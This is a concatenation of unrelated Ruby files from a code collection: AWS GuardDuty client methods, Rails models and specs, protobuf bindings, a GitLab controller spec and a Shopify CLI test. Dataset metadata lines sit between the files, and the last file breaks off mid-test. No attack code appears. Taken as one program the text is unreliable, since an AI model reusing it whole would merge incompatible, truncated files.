# @overload start_monitoring_members(params = {})
# @param [Hash] params ({})
def start_monitoring_members(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:start_monitoring_members, params).send_request(options)
end
# Stops GuardDuty monitoring for the specified member accounts. Use the
# `StartMonitoringMembers` operation to restart monitoring for those
# accounts.
#
# @option params [required, String] :detector_id
# The unique ID of the detector associated with the GuardDuty master
# account that is monitoring member accounts.
#
# @option params [required, Array<String>] :account_ids
# A list of account IDs for the member accounts to stop monitoring.
#
# @return [Types::StopMonitoringMembersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::StopMonitoringMembersResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.stop_monitoring_members({
# detector_id: "DetectorId", # required
# account_ids: ["AccountId"], # required
# })
#
# @example Response structure
#
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/StopMonitoringMembers AWS API Documentation
#
# @overload stop_monitoring_members(params = {})
# @param [Hash] params ({})
def stop_monitoring_members(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:stop_monitoring_members, params).send_request(options)
end
# Adds tags to a resource.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) for the GuardDuty resource to apply a
# tag to.
#
# @option params [required, Hash<String,String>] :tags
# The tags to be added to a resource.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.tag_resource({
# resource_arn: "GuardDutyArn", # required
# tags: { # required
# "TagKey" => "TagValue",
# },
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/TagResource AWS API Documentation
#
# @overload tag_resource(params = {})
# @param [Hash] params ({})
def tag_resource(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:tag_resource, params).send_request(options)
end
# Unarchives GuardDuty findings specified by the `findingIds`.
#
# @option params [required, String] :detector_id
# The ID of the detector associated with the findings to unarchive.
#
# @option params [required, Array<String>] :finding_ids
# The IDs of the findings to unarchive.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.unarchive_findings({
# detector_id: "DetectorId", # required
# finding_ids: ["FindingId"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UnarchiveFindings AWS API Documentation
#
# @overload unarchive_findings(params = {})
# @param [Hash] params ({})
def unarchive_findings(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:unarchive_findings, params).send_request(options)
end
# Removes tags from a resource.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) for the resource to remove tags from.
#
# @option params [required, Array<String>] :tag_keys
# The tag keys to remove from the resource.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.untag_resource({
# resource_arn: "GuardDutyArn", # required
# tag_keys: ["TagKey"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UntagResource AWS API Documentation
#
# @overload untag_resource(params = {})
# @param [Hash] params ({})
def untag_resource(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:untag_resource, params).send_request(options)
end
# Updates the Amazon GuardDuty detector specified by the detectorId.
#
# @option params [required, String] :detector_id
# The unique ID of the detector to update.
#
# @option params [Boolean] :enable
# Specifies whether the detector is enabled or not enabled.
#
# @option params [String] :finding_publishing_frequency
# An enum value that specifies how frequently findings are exported,
# such as to CloudWatch Events.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.update_detector({
# detector_id: "DetectorId", # required
# enable: false,
# finding_publishing_frequency: "FIFTEEN_MINUTES", # accepts FIFTEEN_MINUTES, ONE_HOUR, SIX_HOURS
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UpdateDetector AWS API Documentation
#
# @overload update_detector(params = {})
# @param [Hash] params ({})
def update_detector(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:update_detector, params).send_request(options)
end
# Updates the filter specified by the filter name.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that specifies the GuardDuty service
# where you want to update a filter.
#
# @option params [required, String] :filter_name
# The name of the filter.
#
# @option params [String] :description
# The description of the filter.
#
# @option params [String] :action
# Specifies the action that is to be applied to the findings that match
# the filter.
#
# @option params [Integer] :rank
# Specifies the position of the filter in the list of current filters.
# Also specifies the order in which this filter is applied to the
# findings.
#
# @option params [Types::FindingCriteria] :finding_criteria
# Represents the criteria to be used in the filter for querying
# findings.
#
# @return [Types::UpdateFilterResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UpdateFilterResponse#name #name} => String
#
# @example Request syntax with placeholder values
#
# resp = client.update_filter({
# detector_id: "DetectorId", # required
# filter_name: "String", # required
# description: "FilterDescription",
# action: "NOOP", # accepts NOOP, ARCHIVE
# rank: 1,
# finding_criteria: {
# criterion: {
# "String" => {
# eq: ["String"],
# neq: ["String"],
# gt: 1,
# gte: 1,
# lt: 1,
# lte: 1,
# equals: ["String"],
# not_equals: ["String"],
# greater_than: 1,
# greater_than_or_equal: 1,
# less_than: 1,
# less_than_or_equal: 1,
# },
# },
# },
# })
#
# @example Response structure
#
# resp.name #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UpdateFilter AWS API Documentation
#
# @overload update_filter(params = {})
# @param [Hash] params ({})
def update_filter(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:update_filter, params).send_request(options)
end
# Marks the specified GuardDuty findings as useful or not useful.
#
# @option params [required, String] :detector_id
# The ID of the detector associated with the findings to update feedback
# for.
#
# @option params [required, Array<String>] :finding_ids
# The IDs of the findings that you want to mark as useful or not useful.
#
# @option params [required, String] :feedback
# The feedback for the finding.
#
# @option params [String] :comments
# Additional feedback about the GuardDuty findings.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.update_findings_feedback({
# detector_id: "DetectorId", # required
# finding_ids: ["FindingId"], # required
# feedback: "USEFUL", # required, accepts USEFUL, NOT_USEFUL
# comments: "String",
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UpdateFindingsFeedback AWS API Documentation
#
# @overload update_findings_feedback(params = {})
# @param [Hash] params ({})
def update_findings_feedback(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:update_findings_feedback, params).send_request(options)
end
# Updates the IPSet specified by the IPSet ID.
#
# @option params [required, String] :detector_id
# The detectorID that specifies the GuardDuty service whose IPSet you
# want to update.
#
# @option params [required, String] :ip_set_id
# The unique ID that specifies the IPSet that you want to update.
#
# @option params [String] :name
# The unique ID that specifies the IPSet that you want to update.
#
# @option params [String] :location
# The updated URI of the file that contains the IPSet. For example:
# https://s3.us-west-2.amazonaws.com/my-bucket/my-object-key.
#
# @option params [Boolean] :activate
# The updated Boolean value that specifies whether the IPSet is active
# or not.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.update_ip_set({
# detector_id: "DetectorId", # required
# ip_set_id: "String", # required
# name: "Name",
# location: "Location",
# activate: false,
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UpdateIPSet AWS API Documentation
#
# @overload update_ip_set(params = {})
# @param [Hash] params ({})
def update_ip_set(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:update_ip_set, params).send_request(options)
end
# Updates the delegated administrator account with the values provided.
#
# @option params [required, String] :detector_id
# The ID of the detector to update the delegated administrator for.
#
# @option params [required, Boolean] :auto_enable
# Indicates whether to automatically enable member accounts in the
# organization.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.update_organization_configuration({
# detector_id: "DetectorId", # required
# auto_enable: false, # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UpdateOrganizationConfiguration AWS API Documentation
#
# @overload update_organization_configuration(params = {})
# @param [Hash] params ({})
def update_organization_configuration(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:update_organization_configuration, params).send_request(options)
end
# Updates information about the publishing destination specified by the
# `destinationId`.
#
# @option params [required, String] :detector_id
# The ID of the detector associated with the publishing destinations to
# update.
#
# @option params [required, String] :destination_id
# The ID of the publishing destination to update.
#
# @option params [Types::DestinationProperties] :destination_properties
# A `DestinationProperties` object that includes the `DestinationArn`
# and `KmsKeyArn` of the publishing destination.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.update_publishing_destination({
# detector_id: "DetectorId", # required
# destination_id: "String", # required
# destination_properties: {
# destination_arn: "String",
# kms_key_arn: "String",
# },
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UpdatePublishingDestination AWS API Documentation
#
# @overload update_publishing_destination(params = {})
# @param [Hash] params ({})
def update_publishing_destination(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:update_publishing_destination, params).send_request(options)
end
# Updates the ThreatIntelSet specified by the ThreatIntelSet ID.
#
# @option params [required, String] :detector_id
# The detectorID that specifies the GuardDuty service whose
# ThreatIntelSet you want to update.
#
# @option params [required, String] :threat_intel_set_id
# The unique ID that specifies the ThreatIntelSet that you want to
# update.
#
# @option params [String] :name
# The unique ID that specifies the ThreatIntelSet that you want to
# update.
#
# @option params [String] :location
# The updated URI of the file that contains the ThreateIntelSet. For
# example: https://s3.us-west-2.amazonaws.com/my-bucket/my-object-key.
#
# @option params [Boolean] :activate
# The updated Boolean value that specifies whether the ThreateIntelSet
# is active or not.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.update_threat_intel_set({
# detector_id: "DetectorId", # required
# threat_intel_set_id: "String", # required
# name: "Name",
# location: "Location",
# activate: false,
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UpdateThreatIntelSet AWS API Documentation
#
# @overload update_threat_intel_set(params = {})
# @param [Hash] params ({})
def update_threat_intel_set(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:update_threat_intel_set, params).send_request(options)
end
# @!endgroup
# @param params ({})
# @api private
# Assembles a Seahorse request context for +operation_name+ and wraps it,
# together with the matching handler stack, in a dispatchable Request.
def build_request(operation_name, params = {})
  operation_handlers = @handlers.for(operation_name)
  request_context = Seahorse::Client::RequestContext.new(
    operation_name: operation_name,
    operation: config.api.operation(operation_name),
    client: self,
    params: params,
    config: config
  )
  # Stamp gem identity so the user-agent/telemetry handlers can report it.
  request_context[:gem_name] = 'aws-sdk-guardduty'
  request_context[:gem_version] = '1.35.1'
  Seahorse::Client::Request.new(operation_handlers, request_context)
end
# @api private
# @deprecated
def waiter_names
  # Always empty: this client's API model defines no waiters.
  []
end
class << self
  # @api private
  attr_reader :identifier

  # @api private
  # Returns the Errors namespace holding this client's error classes.
  def errors_module
    Errors
  end
end
end
end
| 42.800683 | 177 | 0.669282 |
ed0c84b1b6a4532a0a5784ff56dee9383fe6103c | 169 | require "rails_helper"
# Model spec for Resource: verifies the :title presence validation and the
# :resourcetype association (shoulda-matchers-style one-liner expectations).
RSpec.describe Resource, type: :model do
  it { is_expected.to validate_presence_of :title }
  it { is_expected.to belong_to :resourcetype }
end
| 24.142857 | 51 | 0.769231 |
62e17f569b1c06d387f7839552c0b80a83972822 | 1,878 | # encoding: utf-8
##
# This file is auto-generated. DO NOT EDIT!
#
require 'protobuf'
##
# Imports
#
require 'google/protobuf/descriptor.pb'
module Google
  module Protobuf
    # Generated bindings for the protobuf compiler plugin protocol
    # (see the "PluginProtos"/pluginpb options below). Auto-generated —
    # do not edit by hand.
    module Compiler
      ::Protobuf::Optionable.inject(self) { ::Google::Protobuf::FileOptions }

      ##
      # Message Classes
      #
      # Declared empty first so fields below can reference each other.
      class Version < ::Protobuf::Message; end
      class CodeGeneratorRequest < ::Protobuf::Message; end
      class CodeGeneratorResponse < ::Protobuf::Message
        class Feature < ::Protobuf::Enum
          define :FEATURE_NONE, 0
          define :FEATURE_PROTO3_OPTIONAL, 1
        end

        class File < ::Protobuf::Message; end
      end

      ##
      # File Options
      #
      set_option :java_package, "com.google.protobuf.compiler"
      set_option :java_outer_classname, "PluginProtos"
      set_option :go_package, "google.golang.org/protobuf/types/pluginpb"

      ##
      # Message Fields
      #
      # Classes are reopened here to attach their field definitions.
      class Version
        optional :int32, :major, 1
        optional :int32, :minor, 2
        optional :int32, :patch, 3
        optional :string, :suffix, 4
      end

      class CodeGeneratorRequest
        repeated :string, :file_to_generate, 1
        optional :string, :parameter, 2
        repeated ::Google::Protobuf::FileDescriptorProto, :proto_file, 15
        optional ::Google::Protobuf::Compiler::Version, :compiler_version, 3
      end

      class CodeGeneratorResponse
        class File
          optional :string, :name, 1
          optional :string, :insertion_point, 2
          optional :string, :content, 15
          optional ::Google::Protobuf::GeneratedCodeInfo, :generated_code_info, 16
        end

        optional :string, :error, 1
        optional :uint64, :supported_features, 2
        repeated ::Google::Protobuf::Compiler::CodeGeneratorResponse::File, :file, 15
      end
    end
  end
end
| 23.475 | 85 | 0.625133 |
class User < ApplicationRecord
  # A user's microposts are destroyed along with the user.
  has_many :microposts, dependent: :destroy
  # Relationships in which this user is the follower.
  has_many :active_relationships, class_name: "Relationship",
                                  foreign_key: "follower_id",
                                  dependent: :destroy
  # Relationships in which this user is the one being followed.
  has_many :passive_relationships, class_name: "Relationship",
                                   foreign_key: "followed_id",
                                   dependent: :destroy
  has_many :following, through: :active_relationships, source: :followed
  has_many :followers, through: :passive_relationships, source: :follower
  # Virtual (non-persisted) tokens; only their digests are stored in the DB.
  attr_accessor :remember_token, :activation_token, :reset_token
  before_save :downcase_email
  before_create :create_activation_digest
  validates :name, presence: true, length: { maximum: 50 }
  VALID_EMAIL_REGEX = /\A[\w+\-.]+@[a-z\d\-.]+\.[a-z]+\z/i
  validates :email, presence: true, length: { maximum: 255 },
                    format: { with: VALID_EMAIL_REGEX },
                    uniqueness: { case_sensitive: false }
  has_secure_password
  # allow_nil lets updates omit the password (leave it unchanged);
  # has_secure_password still enforces presence on create.
  validates :password, presence: true, length: { minimum: 6 }, allow_nil: true

  # Returns the hash digest of the given string.
  # Uses the minimum bcrypt cost in tests for speed.
  def User.digest(string)
    cost = ActiveModel::SecurePassword.min_cost ? BCrypt::Engine::MIN_COST :
                                                  BCrypt::Engine.cost
    BCrypt::Password.create(string, cost: cost)
  end

  # Returns a random token.
  def User.new_token
    SecureRandom.urlsafe_base64
  end

  # Remembers a user in the database for use in persistent sessions:
  # stores the digest of a fresh remember token.
  def remember
    self.remember_token = User.new_token
    update_attribute(:remember_digest, User.digest(remember_token))
  end

  # Returns true if the given token matches the stored digest for
  # +attribute+ (e.g. :remember, :activation, :reset).
  def authenticated?(attribute, token)
    digest = send("#{attribute}_digest")
    return false if digest.nil?
    BCrypt::Password.new(digest).is_password?(token)
  end

  # Forgets a user (invalidates persistent sessions).
  def forget
    update_attribute(:remember_digest, nil)
  end

  # Activates an account.
  def activate
    update_columns(activated: true, activated_at: Time.zone.now)
  end

  # Sends activation email.
  def send_activation_email
    UserMailer.account_activation(self).deliver_now
  end

  # Sets the password reset attributes (token, digest, timestamp).
  def create_reset_digest
    self.reset_token = User.new_token
    update_columns(reset_digest: User.digest(reset_token), reset_sent_at: Time.zone.now)
  end

  # Sends password reset email.
  def send_password_reset_email
    UserMailer.password_reset(self).deliver_now
  end

  # Returns true if a password reset has expired (older than 2 hours).
  def password_reset_expired?
    reset_sent_at < 2.hours.ago
  end

  # Returns a user's status feed: own microposts plus those of followed
  # users, via an SQL subselect to keep it in one query.
  def feed
    following_ids = "SELECT followed_id FROM relationships
                     WHERE follower_id = :user_id"
    Micropost.where("user_id IN (#{following_ids})
                     OR user_id = :user_id", user_id: id)
  end

  # Follows a user.
  def follow(other_user)
    following << other_user
  end

  # Unfollows a user.
  def unfollow(other_user)
    following.delete(other_user)
  end

  # Returns true if the current user is following the other user.
  def following?(other_user)
    following.include?(other_user)
  end

  private

    # Converts email to all lower-case (before_save callback).
    def downcase_email
      email.downcase!
    end

    # Creates and assigns the activation token and digest
    # (before_create callback).
    def create_activation_digest
      self.activation_token = User.new_token
      self.activation_digest = User.digest(activation_token)
    end
end
39d819b4bdf96074c61cf222915c9936b0baef7d | 367 | module Pushcar
module Transport
class Sse < Base
register :sse
def content_type
"application/x-dom-event-stream"
end
def write(data)
renderer.call ["Event: message\n" +
data.split("\n").map { |datum| "data: #{datum}\n" }.join +
"\n"]
end
end
end
end | 21.588235 | 81 | 0.482289 |
# Backtracks through LCS length table +c+ and returns one longest common
# subsequence of strings +x+ and +y+, starting from cell (i, j).
# Iterative equivalent of the usual recursive backtrack: characters are
# collected in reverse order and the result is reversed at the end.
def btr(c, x, y, i, j)
  lcs = ''.dup
  while i >= 1 && j >= 1
    if x[i - 1] == y[j - 1]
      lcs << x[i - 1]
      i -= 1
      j -= 1
    elsif c[i][j - 1] > c[i - 1][j]
      j -= 1
    else
      i -= 1
    end
  end
  lcs.reverse
end
# For each non-empty "x;y" line of the input file, print one longest common
# subsequence of x and y (classic DP table + backtracking via btr).
# File.foreach is used instead of File.open(...).each_line so the file
# handle is closed deterministically instead of leaking until GC.
File.foreach(ARGV[0]) do |line|
  line.chomp!
  next if line.empty?
  x, y = line.split(';')
  # c[i][j] = LCS length of the first i chars of x and the first j of y.
  c = Array.new(x.length + 1) { |_| Array.new(y.length + 1) { |_| 0 } }
  x.each_char.with_index do |xc, ix|
    y.each_char.with_index do |yc, jx|
      if xc == yc
        c[ix + 1][jx + 1] = c[ix][jx] + 1
      else
        c[ix + 1][jx + 1] = [c[ix + 1][jx], c[ix][jx + 1]].max
      end
    end
  end
  puts btr(c, x, y, x.length, y.length)
end
| 27.541667 | 71 | 0.476551 |
ed44ad9b0ae21dd9453b40edef04f9ad38cc90be | 597 | # == Schema Information
#
# Table name: transactions
#
# id :bigint not null, primary key
# user_id :integer not null
# transaction_type :string not null
# created_at :datetime not null
# updated_at :datetime not null
# asset_id :integer
# quantity :integer
# cost_per_share :float
# transaction_amount :float
# ticker :string
#
# Persists a single money/asset movement for a user; see the schema
# annotation above for the full column list.
class Transaction < ApplicationRecord
  # NOTE(review): asset_id/quantity/cost_per_share/ticker are nullable per
  # the schema and intentionally unvalidated here — confirm some
  # transaction types legitimately omit them.
  validates :user_id, :transaction_type, :transaction_amount, presence: true
end
| 27.136364 | 78 | 0.577889 |
ac93393ac3af45bfc902e7a98d0359a577d74afb | 6,917 | require 'spec_helper'
describe Projects::MergeRequests::CreationsController do
let(:project) { create(:project, :repository) }
let(:user) { project.owner }
let(:fork_project) { create(:forked_project_with_submodules) }
let(:get_diff_params) do
{
namespace_id: fork_project.namespace.to_param,
project_id: fork_project,
merge_request: {
source_branch: 'remove-submodule',
target_branch: 'master'
}
}
end
before do
fork_project.add_maintainer(user)
Projects::ForkService.new(project, user).execute(fork_project)
sign_in(user)
end
describe 'GET new' do
context 'merge request that removes a submodule' do
it 'renders new merge request widget template' do
get :new, params: get_diff_params
expect(response).to be_success
end
end
context 'merge request with some commits' do
render_views
let(:large_diff_params) do
{
namespace_id: fork_project.namespace.to_param,
project_id: fork_project,
merge_request: {
source_branch: 'master',
target_branch: 'fix'
}
}
end
describe 'with artificial limits' do
before do
# Load MergeRequestdiff so stub_const won't override it with its own definition
# See https://github.com/rspec/rspec-mocks/issues/1079
stub_const("#{MergeRequestDiff}::COMMITS_SAFE_SIZE", 2)
end
it 'limits total commits' do
get :new, params: large_diff_params
expect(response).to be_success
total = assigns(:total_commit_count)
expect(assigns(:commits)).to be_an Array
expect(total).to be > 0
expect(assigns(:hidden_commit_count)).to be > 0
expect(response).to have_gitlab_http_status(200)
expect(response.body).to match %r(<span class="commits-count">2 commits</span>)
end
end
it 'shows total commits' do
get :new, params: large_diff_params
expect(response).to be_success
total = assigns(:total_commit_count)
expect(assigns(:commits)).to be_an Array
expect(total).to be > 0
expect(assigns(:hidden_commit_count)).to eq(0)
expect(response).to have_gitlab_http_status(200)
expect(response.body).to match %r(<span class="commits-count">#{total} commits</span>)
end
end
end
describe 'GET diffs' do
context 'when merge request cannot be created' do
it 'does not assign diffs var' do
allow_any_instance_of(MergeRequest).to receive(:can_be_created).and_return(false)
get :diffs, params: get_diff_params.merge(format: 'json')
expect(response).to be_success
expect(assigns[:diffs]).to be_nil
end
end
end
describe 'GET pipelines' do
before do
create(:ci_pipeline, sha: fork_project.commit('remove-submodule').id,
ref: 'remove-submodule',
project: fork_project)
end
it 'renders JSON including serialized pipelines' do
get :pipelines, params: get_diff_params.merge(format: 'json')
expect(response).to be_ok
expect(json_response).to have_key 'pipelines'
expect(json_response['pipelines']).not_to be_empty
end
end
describe 'GET diff_for_path' do
def diff_for_path(extra_params = {})
params = {
namespace_id: project.namespace.to_param,
project_id: project,
format: 'json'
}
get :diff_for_path, params: params.merge(extra_params)
end
let(:existing_path) { 'files/ruby/feature.rb' }
context 'when both branches are in the same project' do
it 'disables diff notes' do
diff_for_path(old_path: existing_path, new_path: existing_path, merge_request: { source_branch: 'feature', target_branch: 'master' })
expect(assigns(:diff_notes_disabled)).to be_truthy
end
it 'only renders the diffs for the path given' do
expect(controller).to receive(:render_diff_for_path).and_wrap_original do |meth, diffs|
expect(diffs.diff_files.map(&:new_path)).to contain_exactly(existing_path)
meth.call(diffs)
end
diff_for_path(old_path: existing_path, new_path: existing_path, merge_request: { source_branch: 'feature', target_branch: 'master' })
end
end
context 'when the source branch is in a different project to the target' do
let(:other_project) { create(:project, :repository) }
before do
other_project.add_maintainer(user)
end
context 'when the path exists in the diff' do
it 'disables diff notes' do
diff_for_path(old_path: existing_path, new_path: existing_path, merge_request: { source_project: other_project, source_branch: 'feature', target_branch: 'master' })
expect(assigns(:diff_notes_disabled)).to be_truthy
end
it 'only renders the diffs for the path given' do
expect(controller).to receive(:render_diff_for_path).and_wrap_original do |meth, diffs|
expect(diffs.diff_files.map(&:new_path)).to contain_exactly(existing_path)
meth.call(diffs)
end
diff_for_path(old_path: existing_path, new_path: existing_path, merge_request: { source_project: other_project, source_branch: 'feature', target_branch: 'master' })
end
end
context 'when the path does not exist in the diff' do
before do
diff_for_path(old_path: 'files/ruby/nopen.rb', new_path: 'files/ruby/nopen.rb', merge_request: { source_project: other_project, source_branch: 'feature', target_branch: 'master' })
end
it 'returns a 404' do
expect(response).to have_gitlab_http_status(404)
end
end
end
end
  describe 'GET #branch_to' do
    before do
      # Keep real permission checks except where an example stubs one.
      allow(Ability).to receive(:allowed?).and_call_original
    end
    it 'fetches the commit if a user has access' do
      expect(Ability).to receive(:allowed?).with(user, :read_project, project) { true }
      get :branch_to,
          params: {
            namespace_id: fork_project.namespace,
            project_id: fork_project,
            target_project_id: project.id,
            ref: 'master'
          }
      expect(assigns(:commit)).not_to be_nil
      expect(response).to have_gitlab_http_status(200)
    end
    it 'does not load the commit when the user cannot read the project' do
      expect(Ability).to receive(:allowed?).with(user, :read_project, project) { false }
      get :branch_to,
          params: {
            namespace_id: fork_project.namespace,
            project_id: fork_project,
            target_project_id: project.id,
            ref: 'master'
          }
      # Still a 200 — the commit is simply withheld from the response.
      expect(assigns(:commit)).to be_nil
      expect(response).to have_gitlab_http_status(200)
    end
  end
| 32.32243 | 190 | 0.649559 |
33adae12eada553893fb34df43af9aa81918c32d | 809 | module LanguageServer
module Protocol
module Interface
#
# Show message request client capabilities
#
class ShowMessageRequestClientCapabilities
def initialize(message_action_item: nil)
@attributes = {}
@attributes[:messageActionItem] = message_action_item if message_action_item
@attributes.freeze
end
#
# Capabilities specific to the `MessageActionItem` type.
#
# @return [{ additionalPropertiesSupport?: boolean; }]
def message_action_item
attributes.fetch(:messageActionItem)
end
attr_reader :attributes
def to_hash
attributes
end
def to_json(*args)
to_hash.to_json(*args)
end
end
end
end
end
| 21.864865 | 86 | 0.606922 |
f71d5ea89e5c520c0b224437b355e58a9596aa9e | 1,253 | module Volt
module ReactiveAccessors
module ClassMethods
# Create a method to read a reactive value from an instance value. If it
# is not setup, create it so it can be updated through the reactive value
# at a later point.
def reactive_reader(*names)
names.each do |name|
var_name = :"@#{name}"
define_method(name.to_sym) do
value = instance_variable_get(var_name)
__reactive_dependency_get(name).depend
value
end
end
end
def reactive_writer(*names)
names.each do |name|
var_name = :"@#{name}"
define_method("#{name}=") do |new_value|
instance_variable_set(var_name, new_value)
__reactive_dependency_get(name).changed!
end
end
end
def reactive_accessor(*names)
reactive_reader(*names)
reactive_writer(*names)
end
end
def self.included(base)
base.send :extend, ClassMethods
end
def __reactive_dependency_get(var_name)
value_dep = instance_variable_get(:"@__#{var_name}_dependency")
value_dep ||= instance_variable_set(:"@__#{var_name}_dependency", Dependency.new)
end
end
end
| 26.104167 | 87 | 0.618516 |
f7b989bdb9dc0d7e1bc5818c33eb077ae14e683a | 8,001 | # frozen_string_literal: true
require "project_types/script/test_helper"
describe Script::UI::ErrorHandler do
describe ".display_and_raise" do
let(:failed_op) { "Operation didn't complete." }
let(:cause_of_error) { "This is why it failed." }
let(:help_suggestion) { "Perhaps this is what's wrong." }
subject do
Script::UI::ErrorHandler.display_and_raise(
failed_op: failed_op, cause_of_error: cause_of_error, help_suggestion: help_suggestion
)
end
describe "when failed operation message, cause of error, and help suggestion are all provided" do
it "should abort with the cause of error and help suggestion" do
$stderr.expects(:puts).with("\e[0;31m✗ Error\e[0m")
$stderr.expects(:puts).with("\e[0m#{failed_op} #{cause_of_error} #{help_suggestion}")
assert_raises(ShopifyCli::AbortSilent) do
subject
end
end
end
describe "when failed operation message is missing" do
let(:failed_op) { nil }
it "should abort with the cause of error and help suggestion" do
$stderr.expects(:puts).with("\e[0;31m✗ Error\e[0m")
$stderr.expects(:puts).with("\e[0m#{cause_of_error} #{help_suggestion}")
assert_raises(ShopifyCli::AbortSilent) do
subject
end
end
end
describe "when cause of error is missing" do
let(:cause_of_error) { nil }
it "should abort with the failed operation message and help suggestion" do
$stderr.expects(:puts).with("\e[0;31m✗ Error\e[0m")
$stderr.expects(:puts).with("\e[0m#{failed_op} #{help_suggestion}")
assert_raises(ShopifyCli::AbortSilent) do
subject
end
end
end
describe "when help suggestion is missing" do
let(:help_suggestion) { nil }
it "should abort with the failed operation message and cause of error" do
$stderr.expects(:puts).with("\e[0;31m✗ Error\e[0m")
$stderr.expects(:puts).with("\e[0m#{failed_op} #{cause_of_error}")
assert_raises(ShopifyCli::AbortSilent) do
subject
end
end
end
end
describe ".pretty_print_and_raise" do
let(:err) { nil }
let(:failed_op) { 'message' }
subject { Script::UI::ErrorHandler.pretty_print_and_raise(err, failed_op: failed_op) }
describe "when exception is not in list" do
let(:err) { StandardError.new }
it "should raise" do
assert_raises(StandardError) { subject }
end
end
describe "when exception is listed" do
def should_call_display_and_raise
Script::UI::ErrorHandler.expects(:display_and_raise).once
subject
end
describe "when Errno::EACCESS" do
let(:err) { Errno::EACCES.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when Errno::ENOSPC" do
let(:err) { Errno::ENOSPC.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when Oauth::Error" do
let(:err) { ShopifyCli::OAuth::Error.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when InvalidContextError" do
let(:err) { Script::Errors::InvalidContextError.new('') }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when InvalidConfigProps" do
let(:err) { Script::Errors::InvalidConfigProps.new('') }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when InvalidScriptNameError" do
let(:err) { Script::Errors::InvalidScriptNameError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when NoExistingAppsError" do
let(:err) { Script::Errors::NoExistingAppsError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when NoExistingOrganizationsError" do
let(:err) { Script::Errors::NoExistingOrganizationsError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when NoExistingStoresError" do
let(:err) { Script::Errors::NoExistingStoresError.new(1) }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when ScriptProjectAlreadyExistsError" do
let(:err) { Script::Errors::ScriptProjectAlreadyExistsError.new('/') }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when InvalidExtensionPointError" do
let(:err) { Script::Layers::Domain::Errors::InvalidExtensionPointError.new('') }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when ScriptNotFoundError" do
let(:err) { Script::Layers::Domain::Errors::ScriptNotFoundError.new('ep type', 'name') }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when AppNotInstalledError" do
let(:err) { Script::Layers::Infrastructure::Errors::AppNotInstalledError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when AppScriptUndefinedError" do
let(:err) { Script::Layers::Infrastructure::Errors::AppScriptUndefinedError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when BuildError" do
let(:err) { Script::Layers::Infrastructure::Errors::BuildError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when DependencyInstallError" do
let(:err) { Script::Layers::Infrastructure::Errors::DependencyInstallError.new }
